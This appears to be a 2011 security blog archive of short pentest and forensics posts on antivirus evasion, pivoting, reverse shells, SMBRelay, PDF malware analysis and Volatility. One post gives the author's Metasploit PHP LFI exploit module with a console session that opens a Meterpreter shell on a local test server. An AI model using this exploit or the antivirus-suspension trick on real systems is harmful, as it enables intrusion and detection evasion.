Tuesday, May 31, 2011

Remote DLL injection and Antivirus Evasion

Great post written by Mubix, that explains a really interesting technique to bypass an Antivirus running in a Windows host.

Mubix points out to a DLL written by Didier Stevens that will suspend a process and its threads after a delay.  The idea behind is sending the Antivirus process to sleep in order to avoid detection during the pentest.

I understand that the DLL must be uploaded to the host before it is loaded onto the memory process and,  perhaps, this can be used by the Antivirus to flag the DLL before we have a chance to load it. I wonder if this also can be done by Meterpreter without writing to disk.

Monday, May 30, 2011

Pivoting and Post-Explotation (Spanish)

This video (Spanish) corresponds to a talk offered during the last RootedCon in Madrid and published by the pentester.es blog. It  shows different techniques to perform pivoting through systems in a pentest.


José Selvi - Unprivileged Network Post-Exploitation (Rooted CON 2011) from rootedcon on Vimeo.


I found particularly interesting the mention of the  command line kung fu blog.

Props to Paul Asadoorian,  Ed Skoudis, Hal Pomeranz and Tim Medin :)


At the end of the video, there is a nice demo that uses some shell fu to discover servers in the internal network and setup the forwards in Metasploit. Sweet!

Windows EMET: Enforcing Code Execution Protections

This is a good post from darkoperator that explains how to use EMET to enforce code execution protections in windows binaries, like ASLR and DEP.

As explained in the post, the applications have to be compiled with the right flags in order to use these protections by default, but they can also be manually enabled with EMET.

Friday, May 27, 2011

Linux Reverse Shells Using Built-in Tools

This  post by lanmaster53.com explains how to setup reverse shells on Linux  systems (and many Unix flavors).

The different solutions range from Netcat (with and without  GAPING_SECURITY_HOLE disabled) to crazy combinations of named pipes and telnet connections.

Tuesday, May 24, 2011

Metasploit PHP LFI exploit module

Last week I wrote a simple exploit module for Metasploit to attack PHP applications with LFI vulnerabilities.

It uses php://input to inject the code or the webserver logs in other case.

If I had time, I would like to implement some tricks,  like injection PHP code in the SSH logs or the e-mail server logs, but it is not possible by now :)

Note: It is really buggy and the injection may not be successful, depending on the length of the payload. Please remember that PHP limits the size of the POST message and a long payload may be cut. The same problem applies to the log file injection.


msf exploit(handler) > use exploit/unix/webapp/php_lfi
msf exploit(php_lfi) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_lfi) > set RPORT 8181
RPORT => 8181
msf exploit(php_lfi) > set URI /index.php?foo=xxLFIxx
URI => /index.php?foo=xxLFIxx


msf exploit(php_lfi) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_lfi) > exploit -z


[*] Started bind handler
[*] Trying generic exploits
[*] Clean LFI injection
[*] Sending stage (31612 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:19412 -> 127.0.0.1:4444) at Tue May 24 14:47:29 +0200 2011

C[-] Exploit exception: Interrupt
[*] Session 1 created in the background.
msf exploit(php_lfi) > sessions -i 1
[*] Starting interaction with 1...



meterpreter > ls


Listing: /usr/home/test/cherokee/www
=====================================


Mode              Size  Type  Last modified                   Name
----              ----  ----  -------------                   ----
100644/rw-r--r--  0     fil   Tue May 10 11:09:39 +0200 2011  foo.php
40755/rwxr-xr-x   512   dir   Tue May 10 10:53:59 +0200 2011  images
100644/rw-r--r--  1795  fil   Tue May 10 10:19:23 +0200 2011  index.html
100644/rw-r--r--  37    fil   Tue May 10 13:52:25 +0200 2011  index.php



meterpreter > sysinfo  
OS          : FreeBSD redphantom.skynet.ct 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
Computer    : redphantom.skynet.ct
Meterpreter : php/php  
meterpreter > exit




php_lfi.rb

Python Port of RegRipper Added to Volatility

Thanks to this post I have learned that a Python port of RegRipper has been written and integrated as a Volatility plugin.

This means that Volatility is the first tool that permits cached registry analysis.

How to Extract Flash Objects from Malicious PDF Files

Nice post from the SANS Computer Forensics Blog that explains how to extract Flash Objects from malicious PDF  files.

Why using Flash objects on PDF files? The attackers seem to use ActionScript as an alternative to JavaScript to perform the Heap Spray.

This cheatsheet is being used in conjunction with  pdf-parser or PDF Stream Dumper to extract the objects contained in the PDF.

Once the Flash object has been extracted, SWFTools is used to dissemble it and proceed with the analysis.

At the end, the author of the post links to a real life example.

Tuesday, May 17, 2011

Collection of SMBRelay attacks

This is a series of blog posts from the Digital Security Research Group that collects all the possible ways to gain access by executing SMBRelay attacks or by stealing token credentials.

So far, they have discussed the following scenarios:

- Attacking ERP systems.

- Attacking MSSQL servers.

- SMBRelay and Oracle.

- Security software that scans the clients via SMB

- Attacking corporate users

Fooling Bots and Web Scanners with WebLabyrinth

Nice tech-segment from Pauldotcom that explains how to install  WebLabyrinth, that is a set of PHP scripts that detects and fools bots and web scanners by trapping them in a "Labyrinth" of links.




Monday, May 9, 2011

Analyzing a Compromised Linux Server With Volatility

The Challenge 7 of the Forensic Challenge 2011 from the Honeynet  Project is a good opportunity to use Volatility to analyse a compromised Linux server.

The image and memory dump seem to show a possible compromise via an unpatched vulnerability in Exim (CVE-2010-4345) .

Thursday, May 5, 2011

Why is Metasploit flagged by the AVs?

Nice article from Scriptjunkie that explains why the Metasploit binaries are being flagged by the AVs.

As I understand,  a Metasploit binary is an executable that creates a RWX memory area, loads the encoded shellcode onto it and then it transfers the execution. Therefore, the AVs are not analyzing the encoded shellcode for the detection, but the executable being used to load the shellcode.

A possible solution would be patching another binary of your choosing, but the AVs may flag it as well because it is creating a RWX memory area and then pointing the IP there, which is really suspicious.

Why I do not trust the cloud

This post in the Amazon forums is so impressive in many senses. It comes to explain how cloud computing and a bad engineer can put  human lives and the business into risk.

Somebody was clever enough to put a critical service like a cardiac patients monitoring system on the cloud, without any kind of backup. Yes, it sounds so bad for many reasons...

It turns out that Amazon EC2 went down for some days and the company had all the critical services installed there, without any kind of backup system in another datacenter or whatsoever.  I understand they decided to go to the cloud because it was way cheaper compared with maintaining their own infrastructure, but without playing attention to the possible problems, requirements and regulations they have to comply with.

This is a good example to present to the decision makers when they discuss about moving parts of the infrastructure to cloud services or setting up its own infrastructure. It may be good for the business in a short term, but be prepared for the problems.